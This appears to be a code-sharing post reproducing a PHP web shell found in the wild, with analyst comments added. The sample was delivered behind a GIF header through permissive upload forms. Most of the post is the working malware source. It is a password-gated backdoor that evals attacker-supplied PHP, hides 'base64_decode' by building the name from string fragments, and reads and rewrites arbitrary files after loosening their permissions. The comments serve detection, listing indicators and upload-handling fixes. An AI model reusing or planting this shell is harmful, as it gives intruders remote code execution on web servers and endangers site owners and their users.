@jwieder
Created April 15, 2017 14:14
This is the source code for a RAT (a PHP web shell) I found. The RAT was ROT13-encoded and contained a standard six-byte GIF header. The idea is to upload the file as an attachment through a form or other program that allows such foolishness, i.e. one that accepts a file as an image because of its leading bytes. I found the revision number interesting.
/*
* REVISION: $Rev: 1426 $
*/
// ANALYST ANNOTATIONS: the code below is the sample as posted, unchanged; only comments were added.
// Summary: a password-gated PHP web shell. When the gate passes and an 'f' parameter is present,
// it reads the file named by 'f', eval()s PHP supplied in POST 's', and writes the file back if
// the evaluated code changed $txt_dst.
// Indicators visible in this listing: request parameters 'hhh', 'f', 's', 's1'; upload field 'cmt';
// the hard-coded digest on the next line; response bodies starting "OK: 0" or "ERROR: <n>".
// Delivery (per the description) relied on an upload handler trusting a GIF header, so the relevant
// controls are content validation beyond magic bytes and upload directories that never execute PHP.
//
// Access gate: everything runs only when md5(md5(hhh)) matches the hard-coded digest. The outer
// if has no else branch, so a request without the right value gets no output from this code.
if (md5(md5($_REQUEST['hhh'])) == 'bc5aaff98e1783e8e30f266af63cea42') {
// Raises the execution time limit to 36000 seconds (10 hours) for this request.
set_time_limit(36000);
// Recursively applies stripslashes() to every non-array value of $arr, modifying it in place.
// each() was removed in PHP 8.0, which dates the sample to older PHP runtimes.
function unslash_rec(&$arr)
{
reset($arr);
while (list($key) = each($arr))
{
if (is_array($arr[$key])) unslash_rec($arr[$key]);
else
{
$arr[$key] = stripslashes($arr[$key]);
};
};
};
// Undoes magic-quotes escaping on $_POST only ($_REQUEST is left as received).
// get_magic_quotes_gpc() was also removed in PHP 8.0.
function unslash_gpc()
{
if (get_magic_quotes_gpc())
{
unslash_rec($_POST);
};
};
// 'f' is the path of the file to operate on; it is used below without any validation.
if (array_key_exists('f', $_REQUEST))
{
unslash_gpc();
//header('Content-Type: text/plain');
$txt_src = '';
$txt_dst = '';
// Reads the whole target file into memory; the path comes straight from the request.
if (false === ($txt_src = file_get_contents($_REQUEST['f'])))
die("ERROR: 1 Failed to get file contents: {$_REQUEST['f']}<br/>\n");
// Working copy; the only thing in this listing that can change it is the eval()'d code below.
$txt_dst = $txt_src;
// Sanity check that the number of bytes read equals the size reported for the file.
if (filesize($_REQUEST['f']) != strlen($txt_src))
die("ERROR: 3 File size and contents size mismatch: {$_REQUEST['f']}<br/>\n");
if ($_POST['s'])
{
// The next seven statements assemble the string 'base64_decode' from fragments, presumably so
// the literal function name never appears in the file and simple signature scans miss it.
$cc = '64';
$cc = 'se' . $cc;
$cc .= '_';
$cc .= 'dec';
$cc = 'ba' . $cc;
$cc .= 'od';
$cc .= 'e';
if ($_POST['s1'] == 1) {
// Replaces $_POST['cmt'] with the contents of the uploaded file from the 'cmt' field.
$_POST['cmt'] = file_get_contents($_FILES['cmt']['tmp_name']);
// The string handed to eval() is the text: base64_decode($_POST['s'])
// NOTE(review): this listing does not show the decoded value being used any further; the
// published copy may differ from the original artifact, so confirm against the raw sample.
eval("{$cc}(\$_POST['s'])");
}
else {
// Core capability: runs request-supplied PHP in this scope, with the privileges of the PHP process.
eval($_POST['s']);
}
}
else
{
die("ERROR: 7 UNKNOWN OPERATION REQUESTED<br/>\n");
};
// Write-back happens only if the evaluated code modified $txt_dst (eval shares this scope).
if ($txt_dst != $txt_src)
{
// Saves the current mode, then loosens it to 0666 so the write can succeed.
$stat = @stat($_REQUEST['f']);
if ($stat['mode'])
@chmod($_REQUEST['f'], 0666);
$hf = fopen($_REQUEST['f'], "w");
if (!$hf)
{
// Restores the original permission bits before giving up.
@chmod($_REQUEST['f'], $stat['mode'] & 0777);
// Single-quoted string, so the trailing \n is sent as the two characters backslash and n.
die('ERROR: 2 Failed to open file for writing<br>\n');
};
fwrite($hf, $txt_dst);
fclose($hf);
// Restores the original permission bits. No call in this listing resets the modification time,
// so a rewritten file should show a fresh mtime unless the evaluated payload changes it.
if ($stat['mode'])
@chmod($_REQUEST['f'], $stat['mode'] & 0777);
};
// Success marker returned in the response body; usable as a response-side detection string.
print "OK: 0 ALL OPERATIONS SUCCEEDED<br/>\n";
}
else
{
// The gate passed but no 'f' parameter was supplied.
print "ERROR: 7 UNKNOWN<br/>\n";
};
};